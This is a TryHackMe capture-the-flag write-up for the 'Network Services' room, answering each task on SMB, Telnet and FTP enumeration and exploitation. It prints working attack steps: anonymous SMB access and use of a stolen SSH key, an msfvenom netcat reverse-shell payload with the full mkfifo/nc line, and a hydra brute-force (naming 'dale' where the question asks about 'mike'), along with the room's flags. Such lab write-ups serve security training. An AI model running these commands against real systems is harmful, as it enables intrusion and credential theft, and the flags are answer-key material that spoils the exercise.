TryHackMe Network Services

Network Services

Learn about, then enumerate and exploit a variety of network services and misconfigurations.

This is the write up for the room Network Services on Tryhackme

Here is the write up for the first [Network Services Room](Network Services)

Table of content

Network Services

Task 2 - Understanding SMB

Question	Answer
What does SMB stand for?	Server Message Block
What type of protocol is SMB?	Response-Request
What do clients connect to servers using?	TCP/IP
What systems does Samba run on?	Unix

Task 3 - Enumerating SMB

Question	Answer
Conduct an nmap scan of your choosing, How many ports are open?	3
What ports is SMB running on?	139/445
Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?	WORKGROUP
What comes up as the name of the machine?	POLOSMB
What operating system version is running?	6.1
What share sticks out as something we might want to investigate?	Profiles

Task 4 - Exploiting SMB

Question/Task	Answer
What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?	smbclient //10.10.10.2/secret -U suit -p 445
Great! Now you’ve got a hang of the syntax, let’s have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.	No answer needed
Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn’t require authentication to view the files. We can do this easily by: - using the username “Anonymous” - connecting to the share we found during the enumeration stage - and not supplying a password. Does the share allow anonymous access? Y/N?	Y(es) (smbclient //10.10.218.247/profiles -U Anonymous -p 445)
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?	John Cactus (more “Working From Home Information.txt”)
What service has been configured to allow him to work from home?	ssh
Okay! Now we know this, what directory on the share should we look in?	.ssh
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?	id_rsa
Download this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”. Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. What is the smb.txt flag?	1. `cd .ssh` 2. `mget id_rsa*` 3. New tab + `chmod 600 id_rsa` 4. `ssh cactus@10.10.218.247 -i id_rsa` 5. `cat smb.txt` 6. THM{smb_is_fun_eh?}

Task 5 - Understanding Telnet

Question/Task	Answer
What is Telnet?	application protocol
What has slowly replaced Telnet?	SSH
How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?	telnet 10.10.10.3 23
The lack of what, means that all Telnet communication is in plaintext?	encryption

Task 6 - Enumerating Telnet

Question/Task	Answer	Command
How many ports are open on the target machine?	1	nmap -v -p 1-10000 10.10.13.216
What port is this?	8012
This port is unassigned, but still lists the protocol it’s using, what protocol is this?	TCP
Now re-run the nmap scan, without the -p- tag, how many ports show up as open?	0	nmap 10.10.13.216
Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It’s important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.	N/A
Based on the title returned to us, what do we think this port could be used for?	A backdoor
Who could it belong to? Gathering possible usernames is an important step in enumeration.	Skidy
Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.	N/A

Task 7 - Exploiting Telnet

Question/Task	Answer	Command/Notes
Okay, let’s try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.	N/A	telnet 10.10.121.105 8012
Great! It’s an open telnet connection! What welcome message do we receive?	SKIDY’S BACKDOOR.
Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)	N	No Commands is executed
Hmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.	N/A	Ex. ‘ls’ not working
Start a tcpdump listener on your local machine. If using your own machine with the OpenVPN connection, use: - `sudo tcpdump ip proto \\icmp -i tun0` If using the AttackBox, use: - `sudo tcpdump ip proto \\icmp -i eth0` This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.	N/A
Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)	Y	From Telnet: .RUN ping 10.10.183.166 -c 1
Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let’s have some fun!	N/A
We’re going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here’s our syntax: “msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R” -p = payload lhost = our local host IP address (this is your machine’s IP address) lport = the port to listen on (this is the port on your machine) R = export the payload in raw format What word does the generated payload start with?	mkfifo	msfvenom -p cmd/unix/reverse_netcat lhost=10.10.183.166 lport=4444 R
Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using: “nc -lvp [listening port]“ What would the command look like for the listening port we selected in our payload?	nc -lvp 4444
Great! Now that’s running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully - this will give us a shell on the target machine!	N/A	mkfifo /tmp/sbua; nc 10.10.183.166 4444 0</tmp/sbua \| /bin/sh >/tmp/sbua 2>&1; rm /tmp/sbua
Success! What is the contents of flag.txt?	THM{y0u_g0t_th3_t3ln3t_fl4g}

Task 8 - Understanding FTP

Question/Task	Answer	Command/Notes
What communications model does FTP use?	client-server
What’s the standard FTP port?	21
How many modes of FTP connection are there?	2	The FTP server may support either Active or Passive connections

Task 9 - Enumerating FTP

Question/Task	Answer	Command/Notes
Run an nmap scan of your choice. How many ports are open on the target machine?	2	nmap -sC -sV 10.10.53.218
What port is ftp running on?	21
What variant of FTP is running on it?	vsftpd
Great, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing “ftp [IP]” into the console, and entering “anonymous”, and no password when prompted. What is the name of the file in the anonymous FTP directory?	PUBLIC_NOTICE.txt
What do we think a possible username could be?	Mike	1. get PUBLIC_NOTICE.txt (From victim machine) 2. cat PUBLIC_NOTICE.txt (From own machine)
Great! Now we’ve got details about the FTP server and, crucially, a possible username. Let’s see what we can do with that…	N/A

Skærmbillede 2021-07-23 kl. 10.02.07.png

Skærmbillede 2021-07-23 kl. 10.06.34.png

Task 10 - Exploiting FTP

Question/Task	Answer	Command/Notes
What is the password for the user “mike”?	password	hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.53.218 ftp
Bingo! Now, let’s connect to the FTP server as this user using “ftp [IP]” and entering the credentials when prompted	N/A
What is ftp.txt?	THM{y0u_g0t_th3_ftp_fl4g}	- get ftp.txt (From victim machine) - cat ftp.txt (From own machine)

Skærmbillede 2021-07-23 kl. 10.11.51.png

Task 11 - Expanding Your Knowledge

Well done, you did it!

Written on July 26, 2021